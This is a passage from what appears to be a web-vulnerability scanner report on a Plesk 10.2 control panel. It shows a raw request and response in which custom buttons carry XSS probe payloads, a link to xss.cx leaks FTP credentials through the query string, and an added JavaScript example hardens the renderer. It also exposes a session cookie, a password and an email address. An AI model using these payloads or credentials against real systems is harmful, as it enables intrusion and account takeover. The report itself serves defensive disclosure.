+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

8.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The page was loaded from a URL containing a query string: the request below carries dom_id, dom_name, ftp_user, ftp_pass, cl_id, cname, pname and email as query parameters, so the FTP user name and password (ftp_pass=LL12345%2521%2521) travel in the URL. The Referer header shows the request came from /smb/web/view/id/1/, and the Smb.ToolButton entries in the response show how: the custom buttons created for this test have hrefs such as <script>alert(1)</script>, and the panel appends the subscription parameters (including ftp_user and ftp_pass) to each custom button's href, so following a button resolves to the path shown in this item with the credentials in the query string. The response also contains links to other domains, for example the custom button whose href points at http://xss.cx. When a browser follows such a link from this plain-HTTP page it sends the full page URL, query string included, in the Referer header, so the FTP credentials and the rest of the query string are disclosed to the third-party site (and to proxy logs and browser history along the way). Burp rates this Information severity; the practical check is whether the panel needs these values in the URL at all, since a POST or the server-side session would keep them out of the Referer.

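The following is an added example, written for this page; it is not Plesk code and not part of the original XSS.CX report. The Jsw.List renderers in the captured response build HTML by string concatenation. In the Domain column, displayName goes through escapeHTML(), but in the Hosting column webrootDir and forwardingUrl are concatenated raw into both the href attribute and the link text, and the preview and statistics icons drop a data-supplied string straight into an onclick attribute. The block reproduces the forwarding branch of the Hosting renderer as captured, beside a hardened form that encodes each value for the context it lands in, and runs both over a constructed item carrying the same alert(1) probe used in this report. The names escapeHTML, safeHref, renderHostingAsCaptured, renderHostingHardened, containsLiveMarkup, probeItem and jsUrlItem, and the host example.invalid, are this example's own; escapeHTML is re-implemented because the panel's copy comes from prototype.js, which Node does not have. Whether Plesk validates forwarding URLs server-side before they reach the renderer is not shown on this page, so this demonstrates the renderer's output-encoding contract, not a confirmed injection path.

```javascript
// Added example: not Plesk code and not part of the XSS.CX report.
// Stand-in for the globals the panel sets in its <head> (values as captured).
const Jsw = { baseUrl: '/smb', skinUrl: '/skins/default' };

// Assumption: behaves like prototype.js String#escapeHTML (the panel loads
// prototype.js, which adds escapeHTML to String.prototype; Node has no such method).
function escapeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Attribute-context encoder for href: accept only absolute http(s) URLs, let the
// WHATWG URL parser percent-encode path and query characters, then HTML-encode
// the result. javascript:, data: and bare markup fall through to an inert '#'.
function safeHref(value) {
  try {
    const url = new URL(String(value));
    if (url.protocol === 'http:' || url.protocol === 'https:') {
      return escapeHTML(url.href);
    }
  } catch (err) {
    // not an absolute URL at all
  }
  return '#';
}

// Forwarding branch of the Hosting column renderer, as captured from the panel:
// item.forwardingUrl is inserted raw into the attribute and into the text node.
function renderHostingAsCaptured(item) {
  return '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
    + ' '
    + 'Forward to' + ' '
    + '<a href="' + item.forwardingUrl + '">'
    + item.forwardingUrl
    + '</a>';
}

// Hardened form of the same branch: each data value is encoded for its context
// (URL attribute via safeHref, text node via escapeHTML).
function renderHostingHardened(item) {
  return '<img src="' + escapeHTML(Jsw.skinUrl) + '/img/icons/small/forward-to-dom_16.gif"/>'
    + ' Forward to '
    + '<a href="' + safeHref(item.forwardingUrl) + '">'
    + escapeHTML(item.forwardingUrl)
    + '</a>';
}

// Crude check used to compare the two renderers: does the fragment contain a
// live <script> tag or an attribute break-out sequence ("><tag)?
function containsLiveMarkup(html) {
  return /<script[\s>]/i.test(html) || /"><\/?\w/.test(html);
}

// Constructed test items (not from the captured data): a forwarding URL carrying
// the alert(1) probe used throughout the report, and a javascript: URL.
const probeItem = {
  hostingType: 'std_fwd',
  forwardingUrl: 'http://example.invalid/"><script>alert(1)</script>',
};
const jsUrlItem = {
  hostingType: 'std_fwd',
  forwardingUrl: 'javascript:alert(document.cookie)',
};

console.log('captured :', renderHostingAsCaptured(probeItem));
console.log('hardened :', renderHostingHardened(probeItem));
console.log('js-url   :', renderHostingHardened(jsUrlItem));
```

Run with node; the captured form emits the probe as a live <script> element inside the row, the hardened form emits it as percent-encoded path characters in the href and as entity-encoded text, and the javascript: URL is neutralised to href="#". The same two-encoder pattern applies to the webrootDir link and, for the onclick sinks, to replacing the data-supplied window.open string with a click handler that takes only a validated URL.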
Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view/id/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: advancedPanel-hidden=0; advancedPanel-hidden=0; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:35:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:35:44 GMT
Connection: close
Content-Length: 40354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Fscript%253E%3Fdom_id%3D1%26dom_name%3Dnosedivesailing.com%26ftp_user%3Dxsscx%26ftp_pass%3DLL12345%252521%252521%26cl_id%3D2%26cname%3DHoyt%2BLLC%2BResearch%26pname%3DHoyt%2BLLC%2BResearch%26email%3Dh02332%2540gmail.com' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=0a63ff134f4158a06e65ee63f5e1b0a6\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset 